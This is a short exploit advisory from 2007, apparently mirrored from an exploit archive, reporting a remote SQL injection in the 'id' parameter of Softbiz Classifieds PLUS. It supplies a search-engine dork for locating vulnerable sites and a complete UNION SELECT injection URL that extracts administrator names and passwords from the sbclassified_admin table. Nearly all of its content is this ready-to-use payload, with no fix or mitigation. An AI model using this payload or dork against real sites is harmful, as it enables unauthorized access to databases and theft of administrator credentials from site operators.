id: 2170
date: 09/25/2007
title: Softbiz Classifieds PLUS (id) Remote SQL Injection Vulnerability
author: IRCRASH
cves: 

================================================================
Softbiz Classifieds PLUS (id) Remote SQL Injection Vulnerability
================================================================



##################################################$##################################
####                        Classifieds SQL INJECTION                            ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.w0rm & Dr.Crash)                                             #
#Script Download : http://www.softbizscripts.com/                                   #
#DORK: "Powered by SoftbizScripts" inurl:store_info.php                             #
#                                                                                   #
#                                                                                   #
#                                                                                   #
#Injection Adress : http://server.com/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,pwd,18,19,20,21,22/**/from/**/sbclassified_admin/*
#                                                                                   #
#                                                                                   #
#Our site : Ircrash.com                                                             #
#                                                                                   #
#                                                                                   #
#                                 TNX : GOD                                         #
#####################################################################################



#  0day.today [2023-03-21]  #